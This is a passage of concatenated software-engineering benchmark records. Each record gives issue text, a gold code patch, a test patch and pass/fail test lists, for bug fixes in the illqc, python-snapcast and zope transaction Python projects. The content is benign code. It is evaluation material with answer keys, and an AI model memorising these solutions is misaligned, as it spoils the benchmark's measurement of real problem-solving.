"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_issue_8",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_pinyin_middle_dot",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_pinyin_r_suffix",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_pinyin_to_ipa",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_pinyin_to_zhuyin",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_zhuyin_to_ipa",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_zhuyin_to_pinyin"
] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2017-03-21 14:35:28+00:00
|
mit
| 6,102
|
|
PennChopMicrobiomeProgram__illqc-17
|
diff --git a/illqclib/main.py b/illqclib/main.py
index e8503bf..396d282 100644
--- a/illqclib/main.py
+++ b/illqclib/main.py
@@ -67,7 +67,7 @@ class Trimmomatic(object):
"ILLUMINACLIP:%s:2:30:10:8:true" % self._adapter_fp,
"LEADING:%d" % self.config["leading"],
"TRAILING:%d" % self.config["trailing"],
- "SLIDINGWINDOW:%d:%d" % self.config["slidingwindow"],
+ "SLIDINGWINDOW:%d:%d" % tuple(self.config["slidingwindow"]),
"MINLEN:%d" % self.config["minlen"],
]
|
PennChopMicrobiomeProgram/illqc
|
bc504d4c93300db446ab7b70cb0660f682d07687
|
diff --git a/test/test_main.py b/test/test_main.py
index 7a75113..803ed7b 100644
--- a/test/test_main.py
+++ b/test/test_main.py
@@ -26,17 +26,19 @@ class ConfigTests(unittest.TestCase):
class TrimmomaticTests(unittest.TestCase):
+ config_vals = {
+ "trimmomatic_jar_fp": "trimmomatic-0.30.jar",
+ "adapter_dir": "adapters",
+ "adapter": "NexteraPE-PE",
+ "leading": 3,
+ "trailing": 3,
+ "slidingwindow": (4, 15),
+ "minlen": 36,
+ "java_heapsize":"200M"
+ }
+
def test_make_command(self):
- app = Trimmomatic({
- "trimmomatic_jar_fp": "trimmomatic-0.30.jar",
- "adapter_dir": "adapters",
- "adapter": "NexteraPE-PE",
- "leading": 3,
- "trailing": 3,
- "slidingwindow": (4, 15),
- "minlen": 36,
- "java_heapsize":"200M"
- })
+ app = Trimmomatic(self.config_vals)
observed = app.make_command("a.fastq", "b.fastq", "mydir")
expected = [
'java', '-Xmx200M', '-jar', 'trimmomatic-0.30.jar', 'PE', '-phred33',
@@ -47,3 +49,18 @@ class TrimmomaticTests(unittest.TestCase):
'LEADING:3', 'TRAILING:3', 'SLIDINGWINDOW:4:15', 'MINLEN:36',
]
self.assertEqual(observed, expected)
+
+ def test_make_command_sliding_window_as_list(self):
+ config_vals = self.config_vals.copy()
+ config_vals["slidingwindow"] = [6, 32]
+ app = Trimmomatic(config_vals)
+ observed = app.make_command("a.fastq", "b.fastq", "mydir")
+ expected = [
+ 'java', '-Xmx200M', '-jar', 'trimmomatic-0.30.jar', 'PE', '-phred33',
+ 'a.fastq', 'b.fastq',
+ 'mydir/a.fastq', 'mydir/a_unpaired.fastq',
+ 'mydir/b.fastq', 'mydir/b_unpaired.fastq',
+ 'ILLUMINACLIP:adapters/NexteraPE-PE.fa:2:30:10:8:true',
+ 'LEADING:3', 'TRAILING:3', 'SLIDINGWINDOW:6:32', 'MINLEN:36',
+ ]
+ self.assertEqual(observed, expected)
|
Cannot configure setting for sliding window
Python needs a tuple value for this setting, but JSON does not support tuple types. Suggest converting the value to a tuple before line 70:
https://github.com/PennChopMicrobiomeProgram/illqc/blob/master/illqclib/main.py#L70
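A quick standalone illustration of the suggestion (not the project's code): a JSON config yields a Python list, and %-formatting with two placeholders needs a tuple.
```python
import json

config = json.loads('{"slidingwindow": [4, 15]}')  # JSON arrays load as Python lists

# Converting to a tuple makes the two-placeholder format work:
print("SLIDINGWINDOW:%d:%d" % tuple(config["slidingwindow"]))  # SLIDINGWINDOW:4:15

# Without the conversion, a list raises:
try:
    print("SLIDINGWINDOW:%d:%d" % config["slidingwindow"])
except TypeError as exc:
    print("list fails:", exc)
```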
|
0.0
|
bc504d4c93300db446ab7b70cb0660f682d07687
|
[
"test/test_main.py::TrimmomaticTests::test_make_command_sliding_window_as_list"
] |
[
"test/test_main.py::TrimmomaticTests::test_make_command"
] |
{
"failed_lite_validators": [
"has_short_problem_statement"
],
"has_test_patch": true,
"is_lite": false
}
|
2017-03-04 12:40:47+00:00
|
mit
| 454
|
|
happyleavesaoc__python-snapcast-64
|
diff --git a/setup.py b/setup.py
index 6c934d0..e2fa579 100644
--- a/setup.py
+++ b/setup.py
@@ -2,7 +2,7 @@ from setuptools import setup
setup(
name='snapcast',
- version='2.3.3',
+ version='2.3.4',
description='Control Snapcast.',
url='https://github.com/happyleavesaoc/python-snapcast/',
license='MIT',
diff --git a/snapcast/control/group.py b/snapcast/control/group.py
index 7935b2f..3b9a8be 100644
--- a/snapcast/control/group.py
+++ b/snapcast/control/group.py
@@ -105,8 +105,10 @@ class Snapgroup():
@property
def friendly_name(self):
"""Get friendly name."""
- return self.name if self.name != '' else "+".join(
- sorted([self._server.client(c).friendly_name for c in self.clients]))
+ fname = self.name if self.name != '' else "+".join(
+ sorted([self._server.client(c).friendly_name for c in self.clients
+ if c in [client.identifier for client in self._server.clients]]))
+ return fname if fname != '' else self.identifier
@property
def clients(self):
diff --git a/snapcast/control/server.py b/snapcast/control/server.py
index e93f5b1..afff4b3 100644
--- a/snapcast/control/server.py
+++ b/snapcast/control/server.py
@@ -284,7 +284,6 @@ class Snapserver():
new_groups[group.get('id')].update(group)
else:
new_groups[group.get('id')] = Snapgroup(self, group)
- _LOGGER.debug('group found: %s', new_groups[group.get('id')])
for client in group.get('clients'):
if client.get('id') in self._clients:
new_clients[client.get('id')] = self._clients[client.get('id')]
@@ -292,6 +291,7 @@ class Snapserver():
else:
new_clients[client.get('id')] = Snapclient(self, client)
_LOGGER.debug('client found: %s', new_clients[client.get('id')])
+ _LOGGER.debug('group found: %s', new_groups[group.get('id')])
self._groups = new_groups
self._clients = new_clients
self._streams = new_streams
@@ -402,14 +402,21 @@ class Snapserver():
def _on_stream_update(self, data):
"""Handle stream update."""
- self._streams[data.get('id')].update(data.get('stream'))
- _LOGGER.debug('stream %s updated', self._streams[data.get('id')].friendly_name)
- self._streams[data.get("id")].callback()
- for group in self._groups.values():
- if group.stream == data.get('id'):
- group.callback()
- for clientID in group.clients:
- self._clients.get(clientID).callback()
+ if data.get('id') in self._streams:
+ self._streams[data.get('id')].update(data.get('stream'))
+ _LOGGER.debug('stream %s updated', self._streams[data.get('id')].friendly_name)
+ self._streams[data.get("id")].callback()
+ for group in self._groups.values():
+ if group.stream == data.get('id'):
+ group.callback()
+ for clientID in group.clients:
+ self._clients.get(clientID).callback()
+ else:
+ if data.get('stream', {}).get('uri', {}).get('query', {}).get('codec') == 'null':
+ _LOGGER.debug('stream %s is input-only, ignore', data.get('id'))
+ else:
+ _LOGGER.info('stream %s not found, synchronize', data.get('id'))
+ self.synchronize(self.status())
def set_on_update_callback(self, func):
"""Set on update callback function."""
|
happyleavesaoc/python-snapcast
|
9c8f97cea23015ab2414e9eee43926eca5878634
|
diff --git a/tests/test_group.py b/tests/test_group.py
index 5c3563b..bd99ec2 100644
--- a/tests/test_group.py
+++ b/tests/test_group.py
@@ -28,21 +28,26 @@ class TestSnapgroup(unittest.TestCase):
client.callback = MagicMock()
client.update_volume = MagicMock()
client.friendly_name = 'A'
+ client.identifier = 'a'
server.streams = [stream]
server.stream = MagicMock(return_value=stream)
server.client = MagicMock(return_value=client)
+ server.clients = [client]
self.group = Snapgroup(server, data)
def test_init(self):
self.assertEqual(self.group.identifier, 'test')
self.assertEqual(self.group.name, '')
- self.assertEqual(self.group.friendly_name, 'A+A')
+ self.assertEqual(self.group.friendly_name, 'A')
self.assertEqual(self.group.stream, 'test stream')
self.assertEqual(self.group.muted, False)
self.assertEqual(self.group.volume, 50)
self.assertEqual(self.group.clients, ['a', 'b'])
self.assertEqual(self.group.stream_status, 'playing')
+ def test_repr(self):
+ self.assertEqual(self.group.__repr__(), 'Snapgroup (A, test)')
+
def test_update(self):
self.group.update({
'stream_id': 'other stream'
|
Exceptions thrown when debug logging is enabled
When logging is configured for DEBUG, the following exceptions are thrown upon connecting to my Snapcast server.
```
DEBUG:snapcast.control.server:connected to snapserver on wyseguy:1705
DEBUG:snapcast.control.server:stream found: Snapstream (UPnP)
DEBUG:snapcast.control.server:stream found: Snapstream (Airplay)
DEBUG:snapcast.control.server:stream found: Snapstream (Spotify)
DEBUG:snapcast.control.server:stream found: Snapstream (All Streams)
--- Logging error ---
Traceback (most recent call last):
File "/usr/lib/python3.11/logging/__init__.py", line 1110, in emit
msg = self.format(record)
^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/logging/__init__.py", line 953, in format
return fmt.format(record)
^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/logging/__init__.py", line 687, in format
record.message = record.getMessage()
^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/logging/__init__.py", line 377, in getMessage
msg = msg % self.args
~~~~^~~~~~~~~~~
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/group.py", line 193, in __repr__
return f'Snapgroup ({self.friendly_name}, {self.identifier})'
^^^^^^^^^^^^^^^^^^
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/group.py", line 109, in friendly_name
sorted([self._server.client(c).friendly_name for c in self.clients]))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/group.py", line 109, in <listcomp>
sorted([self._server.client(c).friendly_name for c in self.clients]))
^^^^^^^^^^^^^^^^^^^^^^
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/server.py", line 251, in client
return self._clients[client_identifier]
~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^
KeyError: 'b8:27:eb:e3:17:de'
Call stack:
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/./error.py", line 18, in <module>
asyncio.run(main())
File "/usr/lib/python3.11/asyncio/runners.py", line 190, in run
return runner.run(main)
File "/usr/lib/python3.11/asyncio/runners.py", line 118, in run
return self._loop.run_until_complete(task)
File "/usr/lib/python3.11/asyncio/base_events.py", line 640, in run_until_complete
self.run_forever()
File "/usr/lib/python3.11/asyncio/base_events.py", line 607, in run_forever
self._run_once()
File "/usr/lib/python3.11/asyncio/base_events.py", line 1922, in _run_once
handle._run()
File "/usr/lib/python3.11/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/./error.py", line 14, in main
await snapcast.control.create_server(loop, "wyseguy")
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/__init__.py", line 9, in create_server
await server.start()
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/server.py", line 115, in start
self.synchronize(status)
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/server.py", line 287, in synchronize
_LOGGER.debug('group found: %s', new_groups[group.get('id')])
Unable to print the message and arguments - possible formatting error.
Use the traceback above to help find the error.
DEBUG:snapcast.control.server:client found: Snapclient 0.27.0 (StereoBerry, b8:27:eb:e3:17:de)
--- Logging error ---
Traceback (most recent call last):
File "/usr/lib/python3.11/logging/__init__.py", line 1110, in emit
msg = self.format(record)
^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/logging/__init__.py", line 953, in format
return fmt.format(record)
^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/logging/__init__.py", line 687, in format
record.message = record.getMessage()
^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/logging/__init__.py", line 377, in getMessage
msg = msg % self.args
~~~~^~~~~~~~~~~
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/group.py", line 193, in __repr__
return f'Snapgroup ({self.friendly_name}, {self.identifier})'
^^^^^^^^^^^^^^^^^^
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/group.py", line 109, in friendly_name
sorted([self._server.client(c).friendly_name for c in self.clients]))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/group.py", line 109, in <listcomp>
sorted([self._server.client(c).friendly_name for c in self.clients]))
^^^^^^^^^^^^^^^^^^^^^^
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/server.py", line 251, in client
return self._clients[client_identifier]
~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^
KeyError: 'b8:27:eb:43:7e:9f'
Call stack:
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/./error.py", line 18, in <module>
asyncio.run(main())
File "/usr/lib/python3.11/asyncio/runners.py", line 190, in run
return runner.run(main)
File "/usr/lib/python3.11/asyncio/runners.py", line 118, in run
return self._loop.run_until_complete(task)
File "/usr/lib/python3.11/asyncio/base_events.py", line 640, in run_until_complete
self.run_forever()
File "/usr/lib/python3.11/asyncio/base_events.py", line 607, in run_forever
self._run_once()
File "/usr/lib/python3.11/asyncio/base_events.py", line 1922, in _run_once
handle._run()
File "/usr/lib/python3.11/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/./error.py", line 14, in main
await snapcast.control.create_server(loop, "wyseguy")
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/__init__.py", line 9, in create_server
await server.start()
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/server.py", line 115, in start
self.synchronize(status)
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/server.py", line 287, in synchronize
_LOGGER.debug('group found: %s', new_groups[group.get('id')])
Unable to print the message and arguments - possible formatting error.
Use the traceback above to help find the error.
DEBUG:snapcast.control.server:client found: Snapclient 0.27.0 (NoteBerry, b8:27:eb:43:7e:9f)
DEBUG:snapcast.control.server:Server connected
```
Script to reproduce:
```python3
#!/usr/bin/env python3
import asyncio
import logging
import snapcast.control
async def main():
logging.basicConfig(level=logging.DEBUG)
# Connect to the Snapcast server
loop = asyncio.get_running_loop()
await snapcast.control.create_server(loop, "wyseguy")
try:
asyncio.run(main())
except KeyboardInterrupt:
pass
```
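A standalone sketch of the defensive lookup the patch above introduces (function and variable names are illustrative): skip client ids the server has not registered yet, and fall back to the group identifier when nothing is left.
```python
def safe_friendly_name(group_name, group_identifier, client_ids, known_clients):
    # known_clients maps identifier -> friendly name; ids the server has not
    # registered yet are skipped, and the group identifier is the last resort.
    if group_name:
        return group_name
    names = sorted(known_clients[c] for c in client_ids if c in known_clients)
    return "+".join(names) or group_identifier

print(safe_friendly_name("", "group-1",
                         ["b8:27:eb:e3:17:de", "aa:bb:cc:dd:ee:ff"],
                         {"aa:bb:cc:dd:ee:ff": "Kitchen"}))  # -> Kitchen
```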
|
0.0
|
9c8f97cea23015ab2414e9eee43926eca5878634
|
[
"tests/test_group.py::TestSnapgroup::test_init",
"tests/test_group.py::TestSnapgroup::test_repr"
] |
[
"tests/test_group.py::TestSnapgroup::test_add_client",
"tests/test_group.py::TestSnapgroup::test_remove_client",
"tests/test_group.py::TestSnapgroup::test_set_callback",
"tests/test_group.py::TestSnapgroup::test_set_muted",
"tests/test_group.py::TestSnapgroup::test_set_name",
"tests/test_group.py::TestSnapgroup::test_set_stream",
"tests/test_group.py::TestSnapgroup::test_set_volume",
"tests/test_group.py::TestSnapgroup::test_snapshot_restore",
"tests/test_group.py::TestSnapgroup::test_streams_by_name",
"tests/test_group.py::TestSnapgroup::test_update",
"tests/test_group.py::TestSnapgroup::test_update_mute",
"tests/test_group.py::TestSnapgroup::test_update_stream"
] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2024-02-17 17:53:55+00:00
|
mit
| 2,706
|
|
zopefoundation__transaction-28
|
diff --git a/CHANGES.rst b/CHANGES.rst
index 7569466..4a1e878 100644
--- a/CHANGES.rst
+++ b/CHANGES.rst
@@ -1,6 +1,29 @@
Changes
=======
+2.0.0 (unreleased)
+------------------
+
+- The transaction ``user`` and ``description`` attributes are now
+ defined to be text (unicode) as apposed to Python the ``str`` type.
+
+- Added the ``extended_info`` transaction attribute which contains
+ transaction meta data. (The ``_extension`` attribute is retained as
+ an alias for backward compatibility.)
+
+ The transaction interface, ``ITransaction``, now requires
+ ``extended_info`` keys to be text (unicode) and values to be
+ JSON-serializable.
+
+- Removed setUser from ITransaction. We'll keep the method
+ undefinately, but it's unseemly in ITransaction. :)
+
+The main purpose of these changes is to tighten up the text
+specification of user, description and extended_info keys, and to give
+us more flexibility in the future for serializing extended info. It's
+possible that these changes will be breaking, so we're also increasing
+the major version number.
+
1.7.0 (2016-11-08)
------------------
diff --git a/transaction/_transaction.py b/transaction/_transaction.py
index fd4122e..3aa2050 100644
--- a/transaction/_transaction.py
+++ b/transaction/_transaction.py
@@ -76,10 +76,10 @@ class Transaction(object):
# savepoint to its index (see above).
_savepoint2index = None
- # Meta data. ._extension is also metadata, but is initialized to an
+ # Meta data. extended_info is also metadata, but is initialized to an
# emtpy dict in __init__.
- user = ""
- description = ""
+ _user = u""
+ _description = u""
def __init__(self, synchronizers=None, manager=None):
self.status = Status.ACTIVE
@@ -100,9 +100,9 @@ class Transaction(object):
# manager as a key, because we can't guess whether the actual
# resource managers will be safe to use as dict keys.
- # The user, description, and _extension attributes are accessed
+ # The user, description, and extended_info attributes are accessed
# directly by storages, leading underscore notwithstanding.
- self._extension = {}
+ self.extended_info = {}
self.log = _makeLogger()
self.log.debug("new transaction")
@@ -118,6 +118,28 @@ class Transaction(object):
# List of (hook, args, kws) tuples added by addAfterCommitHook().
self._after_commit = []
+ @property
+ def _extension(self):
+ # for backward compatibility, since most clients used this
+ # absent any formal API.
+ return self.extended_info
+
+ @property
+ def user(self):
+ return self._user
+
+ @user.setter
+ def user(self, v):
+ self._user = v + u'' # + u'' to make sure it's unicode
+
+ @property
+ def description(self):
+ return self._description
+
+ @description.setter
+ def description(self, v):
+ self._description = v + u'' # + u'' to make sure it's unicode
+
def isDoomed(self):
""" See ITransaction.
"""
@@ -504,19 +526,19 @@ class Transaction(object):
"""
text = text.strip()
if self.description:
- self.description += "\n" + text
+ self.description += u"\n" + text
else:
self.description = text
def setUser(self, user_name, path="/"):
""" See ITransaction.
"""
- self.user = "%s %s" % (path, user_name)
+ self.user = u"%s %s" % (path, user_name)
def setExtendedInfo(self, name, value):
""" See ITransaction.
"""
- self._extension[name] = value
+ self.extended_info[name + u''] = value # + u'' to make sure it's unicode
# TODO: We need a better name for the adapters.
diff --git a/transaction/interfaces.py b/transaction/interfaces.py
index 52798fa..c7be269 100644
--- a/transaction/interfaces.py
+++ b/transaction/interfaces.py
@@ -105,7 +105,7 @@ class ITransaction(Interface):
"""A user name associated with the transaction.
The format of the user name is defined by the application. The value
- is of Python type str. Storages record the user value, as meta-data,
+ is text (unicode). Storages record the user value, as meta-data,
when a transaction commits.
A storage may impose a limit on the size of the value; behavior is
@@ -116,7 +116,7 @@ class ITransaction(Interface):
description = Attribute(
"""A textual description of the transaction.
- The value is of Python type str. Method note() is the intended
+ The value is text (unicode). Method note() is the intended
way to set the value. Storages record the description, as meta-data,
when a transaction commits.
@@ -125,6 +125,13 @@ class ITransaction(Interface):
raise an exception, or truncate the value).
""")
+ extended_info = Attribute(
+ """A dictionary containing application-defined metadata.
+
+ Keys must be text (unicode). Values must be simple values
+ serializable with json or pickle (not instances).
+ """)
+
def commit():
"""Finalize the transaction.
@@ -167,7 +174,7 @@ class ITransaction(Interface):
"""
def note(text):
- """Add text to the transaction description.
+ """Add text (unicode) to the transaction description.
This modifies the `.description` attribute; see its docs for more
detail. First surrounding whitespace is stripped from `text`. If
@@ -176,21 +183,17 @@ class ITransaction(Interface):
appended to `.description`.
"""
- def setUser(user_name, path="/"):
- """Set the user name.
-
- path should be provided if needed to further qualify the
- identified user. This is a convenience method used by Zope.
- It sets the .user attribute to str(path) + " " + str(user_name).
- This sets the `.user` attribute; see its docs for more detail.
- """
-
def setExtendedInfo(name, value):
"""Add extension data to the transaction.
- name is the name of the extension property to set, of Python type
- str; value must be picklable. Multiple calls may be made to set
- multiple extension properties, provided the names are distinct.
+ name
+ is the text (unicode) name of the extension property to set
+
+ value
+ must be picklable and json serializable (not an instance).
+
+ Multiple calls may be made to set multiple extension
+ properties, provided the names are distinct.
Storages record the extension data, as meta-data, when a transaction
commits.
|
zopefoundation/transaction
|
085ab4fb0521127cd5428db9fd9fdcd3b8eaed10
|
diff --git a/transaction/tests/test__transaction.py b/transaction/tests/test__transaction.py
index 4e63bb3..8fe8c68 100644
--- a/transaction/tests/test__transaction.py
+++ b/transaction/tests/test__transaction.py
@@ -69,14 +69,15 @@ class TransactionTests(unittest.TestCase):
self.assertTrue(isinstance(txn._synchronizers, WeakSet))
self.assertEqual(len(txn._synchronizers), 0)
self.assertTrue(txn._manager is None)
- self.assertEqual(txn.user, "")
- self.assertEqual(txn.description, "")
+ self.assertEqual(txn.user, u"")
+ self.assertEqual(txn.description, u"")
self.assertTrue(txn._savepoint2index is None)
self.assertEqual(txn._savepoint_index, 0)
self.assertEqual(txn._resources, [])
self.assertEqual(txn._adapters, {})
self.assertEqual(txn._voted, {})
- self.assertEqual(txn._extension, {})
+ self.assertEqual(txn.extended_info, {})
+ self.assertTrue(txn._extension is txn.extended_info) # legacy
self.assertTrue(txn.log is logger)
self.assertEqual(len(logger._log), 1)
self.assertEqual(logger._log[0][0], 'debug')
@@ -983,33 +984,45 @@ class TransactionTests(unittest.TestCase):
txn = self._makeOne()
try:
txn.note('This is a note.')
- self.assertEqual(txn.description, 'This is a note.')
+ self.assertEqual(txn.description, u'This is a note.')
txn.note('Another.')
- self.assertEqual(txn.description, 'This is a note.\nAnother.')
+ self.assertEqual(txn.description, u'This is a note.\nAnother.')
finally:
txn.abort()
+ def test_description_nonascii_bytes(self):
+ txn = self._makeOne()
+ with self.assertRaises((UnicodeDecodeError, TypeError)):
+ txn.description = b'\xc2\x80'
+
def test_setUser_default_path(self):
txn = self._makeOne()
txn.setUser('phreddy')
- self.assertEqual(txn.user, '/ phreddy')
+ self.assertEqual(txn.user, u'/ phreddy')
def test_setUser_explicit_path(self):
txn = self._makeOne()
txn.setUser('phreddy', '/bedrock')
- self.assertEqual(txn.user, '/bedrock phreddy')
+ self.assertEqual(txn.user, u'/bedrock phreddy')
+
+ def test_user_nonascii_bytes(self):
+ txn = self._makeOne()
+ with self.assertRaises((UnicodeDecodeError, TypeError)):
+ txn.user = b'\xc2\x80'
def test_setExtendedInfo_single(self):
txn = self._makeOne()
txn.setExtendedInfo('frob', 'qux')
- self.assertEqual(txn._extension, {'frob': 'qux'})
+ self.assertEqual(txn.extended_info, {u'frob': 'qux'})
+ self.assertTrue(txn._extension is txn._extension) # legacy
def test_setExtendedInfo_multiple(self):
txn = self._makeOne()
txn.setExtendedInfo('frob', 'qux')
txn.setExtendedInfo('baz', 'spam')
txn.setExtendedInfo('frob', 'quxxxx')
- self.assertEqual(txn._extension, {'frob': 'quxxxx', 'baz': 'spam'})
+ self.assertEqual(txn._extension, {u'frob': 'quxxxx', u'baz': 'spam'})
+ self.assertTrue(txn._extension is txn._extension) # legacy
def test_data(self):
txn = self._makeOne()
|
Define transaction description and user to be unicode
See:
https://groups.google.com/forum/#!topic/python-transaction/Yn326XwCZ5E
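A minimal usage sketch (mine, not part of the issue) of the behaviour the patch above introduces, assuming the patched `transaction` package with the new `extended_info` attribute and the text-coercing `user`/`description` setters:

```python
import transaction

txn = transaction.begin()

txn.user = u"phreddy"                # text is accepted as-is
txn.note(u"This is a note.")         # appended to the text description
txn.setExtendedInfo(u"frob", "qux")  # key is coerced to text
assert txn.extended_info == {u"frob": "qux"}
assert txn._extension is txn.extended_info  # legacy alias still works

# The ``v + u''`` trick in the new setters makes non-text values fail loudly:
try:
    txn.user = b"\xc2\x80"
except (TypeError, UnicodeDecodeError):  # TypeError on Python 3, UnicodeDecodeError on Python 2
    pass

txn.abort()
```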
|
0.0
|
085ab4fb0521127cd5428db9fd9fdcd3b8eaed10
|
[
"transaction/tests/test__transaction.py::TransactionTests::test_ctor_defaults",
"transaction/tests/test__transaction.py::TransactionTests::test_description_nonascii_bytes",
"transaction/tests/test__transaction.py::TransactionTests::test_setExtendedInfo_single",
"transaction/tests/test__transaction.py::TransactionTests::test_user_nonascii_bytes"
] |
[
"transaction/tests/test__transaction.py::TransactionTests::test__commitResources_error_in_afterCompletion",
"transaction/tests/test__transaction.py::TransactionTests::test__commitResources_error_in_commit",
"transaction/tests/test__transaction.py::TransactionTests::test__commitResources_error_in_tpc_begin",
"transaction/tests/test__transaction.py::TransactionTests::test__commitResources_error_in_tpc_finish",
"transaction/tests/test__transaction.py::TransactionTests::test__commitResources_error_in_tpc_vote",
"transaction/tests/test__transaction.py::TransactionTests::test__commitResources_normal",
"transaction/tests/test__transaction.py::TransactionTests::test__invalidate_all_savepoints",
"transaction/tests/test__transaction.py::TransactionTests::test__prior_operation_failed",
"transaction/tests/test__transaction.py::TransactionTests::test__remove_and_invalidate_after_hit",
"transaction/tests/test__transaction.py::TransactionTests::test__remove_and_invalidate_after_miss",
"transaction/tests/test__transaction.py::TransactionTests::test__unjoin_hit",
"transaction/tests/test__transaction.py::TransactionTests::test__unjoin_miss",
"transaction/tests/test__transaction.py::TransactionTests::test_abort_clears_resources",
"transaction/tests/test__transaction.py::TransactionTests::test_abort_error_w_afterCompleteHooks",
"transaction/tests/test__transaction.py::TransactionTests::test_abort_error_w_synchronizers",
"transaction/tests/test__transaction.py::TransactionTests::test_abort_w_afterCommitHooks",
"transaction/tests/test__transaction.py::TransactionTests::test_abort_w_beforeCommitHooks",
"transaction/tests/test__transaction.py::TransactionTests::test_abort_w_savepoints",
"transaction/tests/test__transaction.py::TransactionTests::test_abort_w_synchronizers",
"transaction/tests/test__transaction.py::TransactionTests::test_abort_wo_savepoints_wo_hooks_wo_synchronizers",
"transaction/tests/test__transaction.py::TransactionTests::test_addAfterCommitHook",
"transaction/tests/test__transaction.py::TransactionTests::test_addAfterCommitHook_wo_kws",
"transaction/tests/test__transaction.py::TransactionTests::test_addBeforeCommitHook",
"transaction/tests/test__transaction.py::TransactionTests::test_addBeforeCommitHook_w_kws",
"transaction/tests/test__transaction.py::TransactionTests::test_callAfterCommitHook_w_abort",
"transaction/tests/test__transaction.py::TransactionTests::test_callAfterCommitHook_w_error",
"transaction/tests/test__transaction.py::TransactionTests::test_commit_COMMITFAILED",
"transaction/tests/test__transaction.py::TransactionTests::test_commit_DOOMED",
"transaction/tests/test__transaction.py::TransactionTests::test_commit_clears_resources",
"transaction/tests/test__transaction.py::TransactionTests::test_commit_error_w_afterCompleteHooks",
"transaction/tests/test__transaction.py::TransactionTests::test_commit_error_w_synchronizers",
"transaction/tests/test__transaction.py::TransactionTests::test_commit_w_afterCommitHooks",
"transaction/tests/test__transaction.py::TransactionTests::test_commit_w_beforeCommitHooks",
"transaction/tests/test__transaction.py::TransactionTests::test_commit_w_savepoints",
"transaction/tests/test__transaction.py::TransactionTests::test_commit_w_synchronizers",
"transaction/tests/test__transaction.py::TransactionTests::test_commit_wo_savepoints_wo_hooks_wo_synchronizers",
"transaction/tests/test__transaction.py::TransactionTests::test_ctor_w_syncs",
"transaction/tests/test__transaction.py::TransactionTests::test_data",
"transaction/tests/test__transaction.py::TransactionTests::test_doom_active",
"transaction/tests/test__transaction.py::TransactionTests::test_doom_already_doomed",
"transaction/tests/test__transaction.py::TransactionTests::test_doom_invalid",
"transaction/tests/test__transaction.py::TransactionTests::test_getAfterCommitHooks_empty",
"transaction/tests/test__transaction.py::TransactionTests::test_getBeforeCommitHooks_empty",
"transaction/tests/test__transaction.py::TransactionTests::test_isDoomed",
"transaction/tests/test__transaction.py::TransactionTests::test_join_ACTIVE_w_preparing_w_sp2index",
"transaction/tests/test__transaction.py::TransactionTests::test_join_COMMITFAILED",
"transaction/tests/test__transaction.py::TransactionTests::test_join_COMMITTED",
"transaction/tests/test__transaction.py::TransactionTests::test_join_COMMITTING",
"transaction/tests/test__transaction.py::TransactionTests::test_join_DOOMED_non_preparing_wo_sp2index",
"transaction/tests/test__transaction.py::TransactionTests::test_note",
"transaction/tests/test__transaction.py::TransactionTests::test_register_w_jar",
"transaction/tests/test__transaction.py::TransactionTests::test_register_w_jar_already_adapted",
"transaction/tests/test__transaction.py::TransactionTests::test_register_wo_jar",
"transaction/tests/test__transaction.py::TransactionTests::test_savepoint_COMMITFAILED",
"transaction/tests/test__transaction.py::TransactionTests::test_savepoint_empty",
"transaction/tests/test__transaction.py::TransactionTests::test_savepoint_non_optimistc_resource_wo_support",
"transaction/tests/test__transaction.py::TransactionTests::test_setExtendedInfo_multiple",
"transaction/tests/test__transaction.py::TransactionTests::test_setUser_default_path",
"transaction/tests/test__transaction.py::TransactionTests::test_setUser_explicit_path",
